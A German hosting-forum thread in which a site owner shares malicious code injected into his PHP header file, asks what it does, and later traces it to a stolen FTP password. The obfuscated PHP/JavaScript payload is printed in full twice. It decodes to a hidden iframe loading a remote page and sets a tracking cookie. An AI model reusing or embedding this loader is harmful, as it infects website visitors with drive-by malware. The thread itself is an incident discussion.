PHP Injection

[Janchu88]

Guten Tag,

ich mach hobbymäßig bischl Hosting, darunter unter anderem privatzeugs, dass ich mit relativ simplen Scripten online gestellt habe... So, nun musste ich feststellen, dass doch tatsächlich ein Versuch einer PHP-Injection auf einer dieser Seiten stattgefunden hat. Wohl weniger wegen interessantem Zeug, das zu finden wäre, als wohl eher zum Testen und zum üben vermutiche mal.

Es wurde zwar Code injected, aber so wie es aussieht war das Ergebnis nicht das welches sich der Hacker erwartet hat, da er nicht ausgeführt wird sondern Fehlerhafte HTML ausgaben erzeugt.

Ich vermute zu wissen, wie das ganze geklappt hat, jedoch interessiert mich brennend, was der jenige eigentlich versucht hatte... Folgende Code Elemente wurden in der Header Datei Injected


Zu Beginn der Datei wurde folgendes gesetzt.

header('P3P: CP="CAO PSA OUR"');

Am Ende der Header Datei, fand ich folgendes

#a59dc4#
                                                                                                                                                                                                                                                          if(empty($iqmi)) {
$iqmi = "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:67:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:67:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:67:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:59:66:5b:70:5a:5c:69:6b:60:5d:60:5c:5b:25:5a:66:64:26:68:71:5a:5b:2b:3d:6e:47:25:67:5f:67:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:27:2c:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:27:2c:67:6f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:27:2c:67:6f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:27:2c:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:27:2c:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:67:53:1e:17:5a:63:58:6a:6a:34:53:1e:67:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:67:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:67:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1365!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}</script>";
echo $iqmi;
}


#/a59dc4#

Für mich sieht es arg danach aus, als ob jemand Versucht hätte hier Binärcode auszuführen, aufgrund dieser Byteweisen schreibweise. Aber was genau das hier anstellen sollte kriege ich wohl so schnell nicht raus...

Ideen, Anregungen Kommentare, generelle vorbeugende Maßnahmen?

Escaping ist mir kein Fremdwort, nichts desto trotz kam es hier zu

 

[ara1]

naja, was wirds wohl tun, sehr wahrscheinlich Malware von irgendwo nachladen ...
Google mal nach #a59dc4# und Malware, das Zeug ist bekannt. Das war sicher niemand der mal ein bischen "üben" wollte. Evtl. ist kein PHP auf dem Webspace aktiviert weshalb es das dann als HTML ausgegeben hat.

 

[Janchu88]

Es ist PHP aktiv, das ist es ja

Eine Analyse des Quellcodes sieht danach aus, als ob er blind injected hätte... Effektiv scheiterte es daran, dass er einfach nur zwischen den PHP Blöcken injected hat, bzw selbst wohl nen kleinen Fehler im Script hatte wodurch seine Versuche einen PHP Block zu schreiben, einfach nur in den falschen Zeilen landete

<?

?>
				
			</ul>

		</div>

		<div id="content">
		
		<?php 
		
		?>
 
 
 
#a59dc4#
                                                                                                                                                                                                                                                          if(empty($iqmi)) {
$iqmi = "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >sp=\"s\"+\"p\"+\"li\"+\"t\";w=window;z=\"dy\";d=document;aq=\"0x\";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f=\"17:5d:6c:65:5a:6b:60:66:65:17:67:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:67:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:67:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:6e:6e:6e:25:59:66:5b:70:5a:5c:69:6b:60:5d:60:5c:5b:25:5a:66:64:26:68:71:5a:5b:2b:3d:6e:47:25:67:5f:67:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:27:2c:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:27:2c:67:6f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:27:2c:67:6f:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:27:2c:1e:32:4:1:17:67:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:27:2c:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:67:53:1e:17:5a:63:58:6a:6a:34:53:1e:67:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:67:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:67:27:30:1f:20:32:4:1:74:4:1:74\"[sp](\":\");}w=f;s=[];for(i=22-20-2;-i+1365!=0;i+=1){j=i;if((0x19==031))s+=String[\"fromCharCode\"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}</script>";
echo $iqmi;
}


#/a59dc4#

 

[Janchu88]

So, nur zur info

wie es aussieht lief die ganze Geschichte über den ftpZugang...

Gesendet von meinem LG-P880 mit der Hardwareluxx App

 

[manuu]

Dann wars ja auch nicht schwer den Code einzubauen Also sind seine Skripte wohl sicher...nur dein FTP Passwort nicht.

 

[Janchu88]

Sicher war es schon, nur begehe ich einen Fehler NIE NIE NIE wieder.... mich an einem fremden PC mit meinem FTP Zugang anmelden, weiss mittlerweile genau wo das Leck war.

Desweiteren gehe ich weg von Filezilla welches mit unverschlüsselten Passwörtern arbeitet und gehe hin zu WinSCP und sftp/ssh

 

[Janchu88]

und das letzte Update

Da mich die Thematik nichts desto trotz doch beschäftigt hat:

allgemeinen Bruteforce Schutz eingebaut, Antispam Schutz über Captcha im Public Bereich eingebaut, Escaping nochmal komplett gecheckt... wer weitere Infos will PN an mich

 

[Hummerman]

Desweiteren gehe ich weg von Filezilla welches mit unverschlüsselten Passwörtern arbeitet und gehe hin zu WinSCP und sftp/ssh

FileZilla unterstützt FTPS, FTPES und SFTP, muss man nur richtig einrichten. WinSCP ist aber auch keine schlechte Wahl.

 

[DSmon]

Desweiteren gehe ich weg von Filezilla welches mit unverschlüsselten Passwörtern arbeitet

Bitte?
Entweder meinst du die Verbindung zum Server -> dann liegt das nicht an Filezilla, sondern an deiner Wahl des Servers/der Verbindung zum Server
Oder du meinst, dass die Passwörter unverschlüsselt auf dem PC gespeichert werden.
Dazu lass dir sagen, dass jedes Programm, welches dich nicht dazu auffordert, ein Masterpasswort vor jeder Benutzung einzugeben, die Passwörter nur so speichern kann, dass sie jeder mit den Wissen des Speicherortes und wie sie gepeichert werden, die Passwörter "entschlüsseln" kann, das ist bei WinSCP nicht anders als bei Filezilla und nicht anders als bei jedem anderem Programm ..

 

[dirk11]

Vielleicht meint er, der Rechner hatte einen Tastaturlogger. Aber auch dann würde ihm winscp nicht helfen...

 

[Janchu88]

bezog sich auf die standardeinstellungen, sowie den umstand, dass man nichtmal gefragt wird, ob man ein Passwort speichern will. Und der Keylogger war nicht auf meinem Rechner